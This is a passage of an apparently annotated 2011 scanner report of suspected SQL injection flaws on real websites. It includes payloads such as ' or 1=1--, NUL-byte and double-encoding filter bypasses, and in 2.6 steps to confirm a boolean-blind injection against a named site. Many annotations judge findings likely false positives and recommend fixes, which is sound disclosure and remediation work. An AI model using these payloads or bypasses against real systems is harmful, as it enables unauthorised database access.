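The weak filter passes view%2527 although the application ends up with view', and the native filter passes q=%00' because it stops reading at the NUL. The real fix for 2.3 is the one the remediation states: drop the second decode altogether. Where custom canonicalisation genuinely exists, canonicalise() shows the order that keeps the filter and the application looking at the same bytes; a WAF bypass should be reported to the vendor, but the injection itself is fixed in the query code, not in the filter.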

Request 1

GET /search.json?q=techcircle&include_rts=true&callback=TWTR.Widget.receiveCallback_1&rpp=50&since_id=69446875345981440&refresh=true&clientsource=TWITTERINC_WIDGET&1305397212624=cachebust HTTP/1.1
Host: search.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305368954.1

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:24:34 GMT
Server: hi
Vary: Accept-Encoding
Status: 200 OK
Content-Type: application/json; charset=utf-8
Cache-Control: max-age=15, must-revalidate, max-age=300
X-Varnish: 995942193
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-aaq-11-sr3.prod.twitter.com
X-Cache: MISS
Expires: Sat, 14 May 2011 18:29:34 GMT
Connection: close
Content-Length: 90

TWTR.Widget.receiveCallback_1({"error":"You have been rate limited. Enhance your calm."});

Request 2

GET /search.json?q=techcircle&include_rts=true&callback=TWTR.Widget.receiveCallback_1&rpp=50&since_id=69446875345981440&refresh=true&clientsource=TWITTERINC_WIDGET&1305397212624=cachebust HTTP/1.1
Host: search.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305368954.1

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:24:34 GMT
Server: hi
Vary: Accept-Encoding
Status: 200 OK
Content-Type: application/json; charset=utf-8
Cache-Control: max-age=15, must-revalidate, max-age=300
X-Varnish: 245133881
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-aap-15-sr3.prod.twitter.com
X-Cache: MISS
Expires: Sat, 14 May 2011 18:29:34 GMT
Connection: close
Content-Length: 330

TWTR.Widget.receiveCallback_1({"results":[],"max_id":69446875345981440,"since_id":69446875345981440,"refresh_url":"?since_id=69446875345981440&q=techcircle","results_per_page":50,"page":1,"warning":"a
...[SNIP]...

2.6. http://w28.naukri.com/advertiser/bms_hits.php [banner parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w28.naukri.com
Path:   /advertiser/bms_hits.php

Issue detail

The banner parameter appears to be vulnerable to SQL injection attacks. The payloads 11435646'%20or%201%3d1--%20 and 11435646'%20or%201%3d2--%20 were each submitted in the banner parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

The responses here are more telling than in the other difference-based items: with or 1=1 appended the endpoint issues a 302 to http://www.bajajngp.com (a banner row matched and its target URL was used), while with or 1=2 it returns an empty 200 (no row matched). That is the expected signature of a boolean-blind injection in a redirect lookup. To confirm, use the original id 378465 and compare 378465' and 1=1-- against 378465' and 1=2-- : the true condition should redirect to that banner's target and the false one should not.

Request 1

GET /advertiser/bms_hits.php?banner=37846511435646'%20or%201%3d1--%20&othersrcp= HTTP/1.1
Host: w28.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=naukri.com; __utma=159336229.1771676399.1305381499.1305381499.1305381499.1; __utmb=159336229; __utmc=159336229; __utmz=159336229.1305381499.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 1

HTTP/1.1 302 Found
Date: Sat, 14 May 2011 13:58:18 GMT
Server: NWS/1.0. (Unix) PHP/5.2.3
X-Powered-By: PHP/5.2.3
Location: http://www.bajajngp.com
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

Request 2

GET /advertiser/bms_hits.php?banner=37846511435646'%20or%201%3d2--%20&othersrcp= HTTP/1.1
Host: w28.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=naukri.com; __utma=159336229.1771676399.1305381499.1305381499.1305381499.1; __utmb=159336229; __utmc=159336229; __utmz=159336229.1305381499.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 13:58:19 GMT
Server: NWS/1.0. (Unix) PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


2.7. http://www.townnews.com/calendar/asset_manager/event_f229e406-7506-11e0-b056-001cc4c03286.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /calendar/asset_manager/event_f229e406-7506-11e0-b056-001cc4c03286.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

The "general error message" is an HTTP/1.0 503 Server Too Busy with no Server or Date header, an overload response from a front-end proxy, whereas Response 2 is the CMS's own 404 "Element not valid" page. The 503 contains no database error, so reproduce it and show that it follows the quote rather than server load before counting this item.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /calendar/asset_manager/event_f229e406-7506-11e0-b056-001cc4c03286.html%2527 HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /calendar/asset_manager/event_f229e406-7506-11e0-b056-001cc4c03286.html%2527%2527 HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Sat, 14 May 2011 22:48:02 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: townnews.com
Content-Length: 680
Connection: close
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.8. http://www.townnews.com/calendar/banner_ad_manager/event_0cadbf96-771e-11e0-855c-001cc4c03286.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /calendar/banner_ad_manager/event_0cadbf96-771e-11e0-855c-001cc4c03286.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

As in 2.7, Response 1 is a front-end 503 Server Too Busy rather than an application error, and Response 2 is a normal 200 page; the same re-test applies.

Request 1

GET /calendar/banner_ad_manager'/event_0cadbf96-771e-11e0-855c-001cc4c03286.html HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /calendar/banner_ad_manager''/event_0cadbf96-771e-11e0-855c-001cc4c03286.html HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:44 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=4999
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 26464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" c
...[SNIP]...

2.9. http://www.townnews.com/calendar/business_directory_manager/event_d4277864-771e-11e0-9945-001cc4c03286.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /calendar/business_directory_manager/event_d4277864-771e-11e0-9945-001cc4c03286.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

As in 2.7, Response 1 is a front-end 503 Server Too Busy rather than an application error, and Response 2 is the CMS 404 "Element not valid" page; the same re-test applies.

Request 1

GET /calendar/business_directory_manager/event_d4277864-771e-11e0-9945-001cc4c03286.html' HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /calendar/business_directory_manager/event_d4277864-771e-11e0-9945-001cc4c03286.html'' HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:46 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.10. http://www.townnews.com/calendar/search [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /calendar/search

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Two caveats apply to the evidence below. First, request headers are not URL-decoded by the web server, so the %00 in the User-Agent value reaches the application as the three literal characters "%00" unless the application decodes header values itself; both the "attempts to block" inference and the NULL-byte bypass claim depend on that decode happening. Second, Response 1 is an HTTP/1.0 503 "Server Too Busy" with no Server header (a front-end overload response, not a database error) and Response 2 is a 301 redirect to /calendar/search/, so the differential should be re-run against a responsive server before it counts as evidence.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /calendar/search HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /calendar/search HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 301 Moved
Server: WWW
Content-Type: text/html; charset=utf-8
Date: Sat, 14 May 2011 22:47:36 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Location: /calendar/search/
Keep-Alive: timeout=300, max=4998
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 570

<!DOCTYPE html PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
<html>
<head>
<title>301 Moved</title>
</head>
<body>
<script type='text/javascript' src='http://stats.townnews.com/shared-content/stats/common/tr
...[SNIP]...

2.11. http://www.townnews.com/content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Here the probe is the parameter name 1%00' in the query string, which the server does decode, so the NUL byte is real. The evidence is still weak: Response 1 is the front end's HTTP/1.0 503 "Server Too Busy", not an application error, and Response 2 is the CMS's 404 "File Not Found" page. Neither contains a database error string; repeat the pair once the 503s stop before relying on this finding or on the bypass claim.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html?1%00'=1 HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html?1%00''=1 HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:54 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.12. http://www.townnews.com/content_management_solutions/blogs/article_ee26dd4e-6c25-11e0-afd7-001cc4c03286.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /content_management_solutions/blogs/article_ee26dd4e-6c25-11e0-afd7-001cc4c03286.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Note that Response 1 below is the front end's HTTP/1.0 503 "Server Too Busy" (25-byte body, no Server header) rather than an application error, while Response 2 is the CMS's normal 404 page. A 503/404 differential does not show that %2527 was decoded to a quote and reached a query; confirm by re-testing when the server is not shedding load and by looking for a database error string in the error response.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
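Both bypasses the report records on this host, the URL-encoded NUL byte in 2.10 and 2.11 and the double-encoded %2527 here, depend on validation happening on a different representation of the value than the one the query eventually sees. The example below is added here and is not code from the report, the scanner or the scanned site; the filter, the decode order and the probe values are assumptions for illustration, since the real WAF and application code are not visible on the page. It emulates a native-code quote filter that stops reading at the first NUL, an application that URL-decodes a second time, and the remediation the report recommends: canonicalise first, validate afterwards.

```python
"""NUL-byte and double-URL-encoding bypasses of a quote filter, emulated.

Added example, not code from the report, the scanner or the scanned site.
The filter, the decode order and the probe values are assumptions for
illustration.
"""
from urllib.parse import unquote


def native_waf_blocks_quote(raw: str) -> bool:
    """A quote filter written in native code, reading a NUL-terminated
    string: everything after the first \\x00 is invisible to it."""
    visible = raw.split("\x00", 1)[0]
    return "'" in visible


def app_value(raw: str, decodes_again: bool) -> str:
    """The value the application's query eventually sees. The web server has
    already URL-decoded the path or query string once (that is `raw`); some
    applications then decode a second time."""
    return unquote(raw) if decodes_again else raw


def broken_pipeline(raw: str, decodes_again: bool):
    """Validate first, canonicalise afterwards: the order both bypasses
    exploit. Returns (blocked, value_reaching_the_query)."""
    if native_waf_blocks_quote(raw):
        return True, None
    return False, app_value(raw, decodes_again)


def fixed_pipeline(raw: str, decodes_again: bool):
    """Canonicalise first, validate afterwards: drop NULs, apply the same
    decode the application will use, and only then inspect the value."""
    value = app_value(raw.replace("\x00", ""), decodes_again)
    if "'" in value:
        return True, None
    return False, value


# Probe values as the web server hands them on after its single URL-decode:
# "%00'" has become "\x00'", and "%2527" has become "%27".
NUL_PROBE = "\x00'"
DOUBLE_ENCODED_PROBE = "%27"


if __name__ == "__main__":
    print("NUL byte, broken order   :", broken_pipeline(NUL_PROBE, False))
    print("double-encoded, app decodes twice:", broken_pipeline(DOUBLE_ENCODED_PROBE, True))
    print("NUL byte, fixed order    :", fixed_pipeline(NUL_PROBE, False))
    print("double-encoded, no second decode :", fixed_pipeline(DOUBLE_ENCODED_PROBE, False))
```

With no second decode in the application, %2527 stays the inert literal "%27" all the way to the query, which is the point of the remediation text above. Blocking quotes after canonicalisation closes these two bypasses, but it is still a filter; the durable fix for the query itself is a bound parameter, so that a quote is data rather than syntax.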

Request 1

GET /content_management_solutions%2527/blogs/article_ee26dd4e-6c25-11e0-afd7-001cc4c03286.html HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions%2527%2527/blogs/article_ee26dd4e-6c25-11e0-afd7-001cc4c03286.html HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:01 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.13. http://www.townnews.com/content_management_solutions/calendar/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /content_management_solutions/calendar/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The "general error message" here is again an HTTP/1.0 503 "Server Too Busy" from the front end, and the "disappearance" is a 404 "File Not Found" from the CMS. Both are plausible responses to a malformed path regardless of any database query, so treat this as unconfirmed until a re-test shows a consistent, application-generated error.

Request 1

GET /content_management_solutions'/calendar/ HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions''/calendar/ HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:01 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.14. http://www.townnews.com/favicon.ico [TNNoMobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /favicon.ico

Issue detail

The TNNoMobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the TNNoMobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Two caveats: cookie values are not URL-decoded by the web server, so whether TNNoMobile=1%2527 reaches the application as "%27" or as the literal six characters depends on the application's own cookie parsing; and Response 2 is the favicon itself served from cache (X-Cache-Info: cached, Content-Type: image/x-icon), a static file that is unlikely to involve a database query at all. Response 1 is the front end's HTTP/1.0 503 "Server Too Busy". Absent a re-test, this finding is better explained by load shedding than by SQL handling.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the TNNoMobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.townnews.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1%2527

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /favicon.ico HTTP/1.1
Host: www.townnews.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1%2527%2527

Response 2

HTTP/1.1 200 OK
Server: WWW
Content-Type: image/x-icon
Date: Sat, 14 May 2011 22:23:09 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "50876973"
Last-Modified: Mon, 19 Oct 2009 15:48:42 GMT
Real-Hostname: townnews.com
Content-Length: 1150
Connection: Keep-Alive
X-Cache-Info: cached

............ .h.......(....... ..... ................................................................................................................................................j..................
...[SNIP]...

2.15. http://www.townnews.com/marketplace/business_434b7195-75b6-5eb4-bb91-74beeb7a6ba6.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /marketplace/business_434b7195-75b6-5eb4-bb91-74beeb7a6ba6.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

As with the other path findings on this host, Response 1 is the front end's HTTP/1.0 503 "Server Too Busy" and Response 2 is the CMS's 404 "File Not Found" page; no database error text appears in either. Re-run the probe pair against a responsive server before relying on this.

Request 1

GET /marketplace'/business_434b7195-75b6-5eb4-bb91-74beeb7a6ba6.html HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /marketplace''/business_434b7195-75b6-5eb4-bb91-74beeb7a6ba6.html HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:32 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=4999
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.16. http://www.townnews.com/search/ [l parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /search/

Issue detail

The l parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the l parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

The l parameter (probably a result limit, given l=100 alongside sort parameters) is a plausible injection point, but the evidence is weak: Response 1 is the front end's HTTP/1.0 503 "Server Too Busy", and Response 2 for l=100%2527%2527 is a 404 "File Not Found" rather than a search result, so neither request appears to have reached the search handler normally. Re-test and inspect the error body for a database error string.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the l request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /search/?q=&t=article&l=100%2527&d=&d1=&d2=&s=start_time&sd=desc&c[]=content_management_solutions/blogs,content_management_solutions/blogs/*&f=rss HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /search/?q=&t=article&l=100%2527%2527&d=&d1=&d2=&s=start_time&sd=desc&c[]=content_management_solutions/blogs,content_management_solutions/blogs/*&f=rss HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:36 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
